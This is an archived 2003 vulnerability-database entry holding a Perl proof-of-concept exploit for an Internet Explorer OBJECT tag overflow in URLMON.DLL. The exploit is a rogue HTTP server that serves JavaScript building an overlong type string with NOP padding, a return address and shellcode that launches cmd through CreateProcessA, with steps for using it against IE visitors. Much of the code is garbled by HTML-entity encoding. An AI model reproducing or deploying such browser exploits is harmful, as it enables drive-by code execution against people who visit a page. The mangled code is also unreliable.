Lucene search

SecurityvulnsSECURITYVULNS:DOC:4670

HistoryJun 09, 2003 - 12:00 a.m.

IE-object tag longtype exploit

2003-06-0900:00:00

vulners.com

JSON

#!/usr/bin/perl

#=synopsis

06/06/03 - Proof of concept exploit by Sir Alumni ([email protected])

IE-Object longtype dynamic call oferflow

[…]

url://<$shellcode><'/'x48><jmp %ptr_sh>

the flaw actually exists in URLMON.DLL when converting backslashes

to wide char,

this can be seen on stack dump near '&CLSID=AAA…2F2F…'.

[…]

To exploit: i) start server perl script;

ii) connect to http-service using IE/5.x.

Tested: IE-5.x, 6.0? on WinXP.

Note: a) the shellcode size is limited up to 56 bytes;

b) the '$ret' may differ as well as the image base of

KERNEL32.DLL;

c) to avoid multiple encoding the shellcode is given 'as

is' with help of JScript.

#=synopsis

use IO::Socket;

$port = 80;

$server = IO::Socket::INET->new (LocalPort => $port,

                            Type =&gt;SOCK_STREAM,

                            Reuse =&gt; 1,

                            Listen =&gt; $port&#41; or die&#40;&quot;Couldnt&#39;t create

server socket\n");

$shellcode = "\x33\xdb". # xor ebx, ebx

            &quot;&#92;x8b&#92;xd4&quot;.             # mov edx, esp

            &quot;&#92;x80&#92;xc6&#92;xff&quot;.         # add dh, 0xFF

            &quot;&#92;xc7&#92;x42&#92;xfc&#92;x63&#92;x6d&quot;. # mov dword ptr[edx-4], 0x01646D63

("cmd\x01")

            &quot;&#92;x64&#92;x01&quot;.             #

            &quot;&#92;x88&#92;x5a&#92;xff&quot;.         # mov byte ptr[edx-1], bl

            &quot;&#92;x8d&#92;x42&#92;xfc&quot;.         # lea eax, [edx-4]

            &quot;&#92;x8b&#92;xf5&quot;.             # mov esi, ebp

            &quot;&#92;x56&#92;x52&quot;.             # push esi; push edx

            &quot;&#92;x53&#92;x53&#92;x53&#92;x53&#92;x53&#92;x53&quot;.     # push ebx

            &quot;&#92;x50&#92;x53&quot;.             # push eax; push ebx

            &quot;&#92;xb8&#92;x41&#92;x77&#92;xf7&#92;xbf&quot;. # mov eax, 0xBFF77741 ~=

CreateProcessA

            &quot;&#92;xff&#92;xd0&quot;.             # call eax

            &quot;&#92;xb8&#92;xf8&#92;xd4&#92;xf8&#92;xbf&quot;. # mov eax, 0xBFF8D4F8 ~=

ExitProcess

            &quot;&#92;xff&#92;xd0&quot;.             # call eax

            &quot;&#92;xcc&quot;;                 # int 3

$nop = "\x90";

$ret = "\\xAB\\x5D\\x58";

while ($client = $server->accept()) {

    while &#40;&lt;$client&gt;&#41; {

            if &#40;$_ =~ /^&#40;&#92;x0D&#92;x0A&#41;/&#41; {

print $client <<END_DATA;

HTTP/1.0 200 Ok\r

Content-Type: text/html\r

<script>\r

    var mins = 56;&#92;r

    var size = 48;&#92;r

    var sploit = &quot;$shellcode&quot;;&#92;r

    var strNop = &quot;$nop&quot;;&#92;r

    var strObj = &#39;&lt;object type=&quot;&#39;;&#92;r

    for &#40;i=0;i&lt;mins-sploit.length;i++&#41; strObj += strNop;&#92;r

    strObj += sploit;&#92;r

    for &#40;i=0;i&lt;size;i++&#41; strObj += &#39;/&#39;;&#92;r

    strObj += &quot;CCCCCCCCDDDDDDDD&quot;;&#92;r

    strObj += &quot;$ret&quot;;&#92;r

    strObj += &#39;&quot;&gt;Hello&lt;/object&gt;&#39;;&#92;r

    alert&#40;strObj&#41;;&#92;r

    document.write&#40;strObj&#41;;&#92;r

</script>\r

END_DATA

                    close&#40;$client&#41;;



            }

    }

}

close($server);